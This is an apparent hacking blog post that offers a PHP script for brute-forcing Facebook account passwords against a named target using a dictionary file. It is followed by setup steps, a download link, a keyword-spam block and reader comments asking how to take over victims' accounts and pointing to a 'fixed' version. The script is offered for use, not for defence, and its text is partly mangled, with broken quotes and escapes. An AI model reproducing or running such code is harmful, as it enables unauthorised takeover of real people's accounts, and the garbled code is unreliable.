Facebook bruteforce exploit

Facebook, Inc.
Image via Wikipedia

This facebook php bruteforce exploit script might be a lil’ bit different from the previous one (Facebook Account Bruteforce Cracker for Facebook Kiddos). This facebook bruteforce php script is coded by someone on darkc0de. Before you can use this script to bruteforce facebook account , you have to do the following things :
- upload your codes to host as facebook.php and create cookie.txt
- change your $username and $dictionary variables according your information and execute your codes like this : http://your-web-site-or-host/facebook.php

################################
# Face Book Brute Forcer
################################
set_time_limit(0);
$username =”brute@force.org”; // username to brute force
$dictionary =”dictionary.txt”; // need dictionary to password list

function kontrol($kullaniciadi,$sifre){
$useragent = “Opera/9.21 (Windows NT 5.1; U; tr)”;
$data = “email=$kullaniciadi&pass=$sifre&login=Login” ;
$ch = curl_init(‘https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php’);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, ‘cookie.txt’);
curl_setopt($ch, CURLOPT_COOKIEJAR, ‘cookie.txt’);
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi(“Home”,$source)){return true;} else {return false;}

}

if(!is_file($dictionary)){echo “$dictionary is not file”;exit;}
$lines=file($dictionary);
echo “Attack Starting..
“;
sleep(10);
echo “Attack Started, brute forcing..
“;
foreach($lines as $line){
$line=str_replace(“r”,”",$line);
$line=str_replace(“n”,”",$line);
if(kontrol($username,$line)){echo “[+] username:$username , password:$line – P
assword found : $line

“;$fp=fopen(‘cookie.txt’,'w’);fwrite($fp,”);exit;}
else{echo “[-] username:$username , password:$line – Password not found :
$line

“;}
}
?>

Download Facebook php bruteforce script : http://darkc0de.com/c0de/php/face_book_brute_forcer.txt

Recenly search

Incoming search terms for the article:

https://login facebook com/login php?login_attempt=brute force facebookfacebook brute forcehttps:login facebook comlogin php?login_attempt=1facebook exploithttps://login facebook com/login php?login_attempt=1bruteforce facebookexploit facebookfacebook bruteforcehow to brute force facebookhttps:login facebook comlogin php?login_attemptfacebook exploitsfacebook bruteforcerbrute force facebook passwordfacebook brutefacebook brute forcerbrute forcing facebookfacebook brute force attackbrute force password cracker facebookbrute force for facebookFace Book Brute Forcerbrute force attack facebookforce brute facebookhttps://login facebook com/login php?login_attemptfacebook brute force passwordbrute force facebook hackbrute force facebook accountfacebook com loginbruteforcer facebookscript brute force facebookFacebook BruteForce Scriptfacebook login exploithack facebook brute forcehow to brute force a facebook accounthttps: login facebook com login php login_attemptfacebook com/login php?login_attempt=1BRUTE facebookfacebook brute force scripthow to brute force a facebook passwordfacebook login phpexploit facebook passwordfacebook password exploitbrute force hacking facebookfacebook brute force password crackerbrut force facebookfacebook password brute forcelogin facebook phpbrute force attack on facebook://login facebook com/login php?login_attempt=1bruteforcing facebook,  
Popular Today naruto shippuden 170 videologcat physics walkthroughnaruto shippuden 168 videologfacebook spybacktrack 3shy enginevtunnelBackTrack tutorialbacktrack 3 tutorialfacebook photo viewerSee The Shocking Hidden Message In The Google Logo that GOOGLE Does NOT Want You To Know About!how to view private myspace picturesmy empire hackview private myspace picturesSHOCKING: RUDE HIDDEN MESSAGE in Toy Story 3!facebook keyloggerHIDDEN MESSAGE IN GOOGLE LOGOTerri Moulton Hormanrapidleechbrute force facebook,   Computer Security Stuff on eBay!
Electronics stuffs on ebay

9 Responses to “Facebook bruteforce exploit”

  1. Doesnt work. :(

  2. This script returns the first attempt as a positve match everytime.

  3. then you guys don’t know how to work scripts, seems to work fine.

  4. with some changes it works fine….. you just need good password dictionary, script execution and several weeks or months :D

  5. where to find password dictionary?

  6. Does not work.
    I created an account and used one the words from a dictionary list.

    Password not found.

  7. I have got two questions to ask, “does this script allow me to gain control of the victims face book account” second of all, ” how do I upload to the host and create a cookie file and make this thing work”. It would be a great help if that you could add me on msn messenger or email or private message me. (Im just a bit of newbie when it comes to brute forcing and cookies and php and stuff)
    Please help me!

  8. Doesn’t work …
    I have a return :
    “,$source)){return true;} else {return false;} } if(!is_file($dictionary)){echo “$dictionary is not file”;exit;} $lines=file($dictionary); echo “Attack Starting..
    “; sleep(10); echo “Attack Started, brute forcing..
    “; foreach($lines as $line){ $line=str_replace(“\r”,”",$line); $line=str_replace(“\n”,”",$line); if(kontrol($username,$line)){echo “[+] username:$username , password:$line – P assword found : $line
    “;$fp=fopen(‘cookie.txt’,'w’);fwrite($fp,”);exit;} else{echo “[-] username:$username , password:$line – Password not found : $line
    “;} } ?>

    Any one can help me ???

  9. There is an errore on the code…
    these strings:

    $line=str_replace(”r”,””,$line);
    $line=str_replace(”n”,””,$line);

    Must be replaced whit this:

    $line=str_replace(”\r\n”,””,$line);

    Go to my Website to download the correct script!
    http://www.pcexpert-blog.com/2009/10/trovare-la-password-di-un-qualsiasi-account-facebook-attraverso-un-attacco-a-dizionario.html

Leave a Reply